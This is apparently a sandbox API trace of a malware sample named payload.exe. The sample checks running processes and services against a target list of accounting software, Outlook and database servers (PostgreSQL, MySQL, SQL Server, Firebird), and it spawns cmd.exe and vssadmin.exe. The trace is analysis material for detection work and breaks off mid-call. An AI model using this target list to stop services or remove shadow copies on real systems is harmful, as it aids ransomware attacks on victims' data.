[0263.536] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0263.536] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0263.536] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.537] lstrlenW (lpString="svchost.exe") returned 11 [0263.537] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.537] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.537] lstrlenW (lpString="svchost.exe") returned 11 [0263.537] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.537] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.537] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.538] lstrlenW (lpString="svchost.exe") returned 11 [0263.538] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.538] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.538] lstrlenW (lpString="svchost.exe") returned 11 [0263.538] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.538] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.538] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.539] lstrlenW (lpString="svchost.exe") returned 11 [0263.539] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.539] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.539] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.539] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.539] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.539] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.539] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.539] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.539] lstrlenW (lpString="audiodg.exe") returned 11 [0263.539] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0263.539] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0263.539] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0263.539] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0263.539] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0263.539] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0263.539] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0263.539] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.540] lstrlenW (lpString="svchost.exe") returned 11 [0263.540] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.540] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.540] lstrlenW (lpString="svchost.exe") returned 11 [0263.540] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.540] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.540] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0263.541] lstrlenW (lpString="userinit.exe") returned 12 [0263.541] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.541] lstrlenW (lpString="dwm.exe") returned 7 [0263.541] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.541] lstrlenW (lpString="explorer.exe") returned 12 [0263.541] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.542] lstrlenW (lpString="spoolsv.exe") returned 11 [0263.542] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.542] lstrlenW (lpString="taskhost.exe") returned 12 [0263.542] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.542] lstrlenW (lpString="svchost.exe") returned 11 [0263.542] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0263.542] lstrlenW (lpString="payload.exe") returned 11 [0263.542] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0263.543] lstrlenW (lpString="dllhost.exe") returned 11 [0263.543] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0263.543] lstrlenW (lpString="reader_sl.exe") returned 13 [0263.543] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0263.543] lstrlenW (lpString="cmd.exe") returned 7 [0263.543] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0263.543] lstrlenW (lpString="conhost.exe") returned 11 [0263.543] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0263.544] lstrlenW (lpString="vssadmin.exe") returned 12 [0263.544] Process32NextW (in: hSnapshot=0x140, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0263.544] CloseHandle (hObject=0x140) returned 1 [0263.544] Sleep (dwMilliseconds=0x1f4) [0264.216] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c0908 [0264.307] EnumServicesStatusExW (in: hSCManager=0x43c0908, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0264.507] GetLastError () returned 0xea [0264.507] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xacc) returned 0x57d8c0 [0264.507] EnumServicesStatusExW (in: hSCManager=0x43c0908, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xacc, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0264.507] CloseServiceHandle (hSCObject=0x43c0908) returned 1 [0264.508] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0264.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.508] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0264.508] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0264.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0264.508] lstrlenW (lpString="AudioSrv") returned 8 [0264.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0264.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0264.508] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0264.508] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0264.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0264.508] lstrlenW (lpString="BFE") returned 3 [0264.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0264.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0264.508] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0264.508] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0264.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0264.508] lstrlenW (lpString="CscService") returned 10 [0264.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0264.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0264.508] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0264.508] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0264.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0264.509] lstrlenW (lpString="DcomLaunch") returned 10 [0264.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.509] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0264.509] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0264.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0264.509] lstrlenW (lpString="Dhcp") returned 4 [0264.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0264.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0264.509] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0264.509] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0264.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0264.509] lstrlenW (lpString="Dnscache") returned 8 [0264.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0264.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0264.509] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0264.509] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0264.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0264.509] lstrlenW (lpString="eventlog") returned 8 [0264.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0264.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0264.509] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0264.509] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0264.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0264.509] lstrlenW (lpString="EventSystem") returned 11 [0264.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0264.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0264.509] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0264.509] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0264.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0264.509] lstrlenW (lpString="gpsvc") returned 5 [0264.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0264.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0264.510] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0264.510] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0264.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0264.510] lstrlenW (lpString="LanmanWorkstation") returned 17 [0264.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0264.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0264.510] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0264.510] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0264.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0264.510] lstrlenW (lpString="lmhosts") returned 7 [0264.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0264.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0264.510] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0264.510] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0264.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0264.510] lstrlenW (lpString="MMCSS") returned 5 [0264.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0264.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0264.510] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0264.510] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0264.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0264.510] lstrlenW (lpString="MpsSvc") returned 6 [0264.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0264.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0264.510] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0264.510] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0264.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0264.510] lstrlenW (lpString="nsi") returned 3 [0264.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0264.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0264.511] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0264.511] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0264.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0264.511] lstrlenW (lpString="PlugPlay") returned 8 [0264.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0264.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0264.511] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0264.511] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0264.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0264.511] lstrlenW (lpString="Power") returned 5 [0264.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0264.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0264.511] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0264.511] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0264.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0264.511] lstrlenW (lpString="ProfSvc") returned 7 [0264.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0264.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0264.511] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0264.511] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0264.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0264.511] lstrlenW (lpString="RpcEptMapper") returned 12 [0264.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0264.511] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0264.511] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0264.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0264.511] lstrlenW (lpString="RpcSs") returned 5 [0264.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0264.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0264.511] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0264.511] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0264.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0264.512] lstrlenW (lpString="SamSs") returned 5 [0264.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0264.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0264.512] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0264.512] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0264.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0264.512] lstrlenW (lpString="Schedule") returned 8 [0264.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0264.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0264.512] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0264.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0264.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0264.512] lstrlenW (lpString="SENS") returned 4 [0264.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0264.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0264.512] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0264.512] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0264.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0264.512] lstrlenW (lpString="ShellHWDetection") returned 16 [0264.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0264.512] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0264.512] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0264.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0264.512] lstrlenW (lpString="Spooler") returned 7 [0264.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0264.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0264.512] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0264.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0264.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0264.512] lstrlenW (lpString="Themes") returned 6 [0264.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0264.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0264.513] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0264.513] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0264.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0264.513] lstrlenW (lpString="UxSms") returned 5 [0264.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0264.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0264.513] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0264.513] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0264.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0264.513] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0264.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x378 [0264.514] Process32FirstW (in: hSnapshot=0x378, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 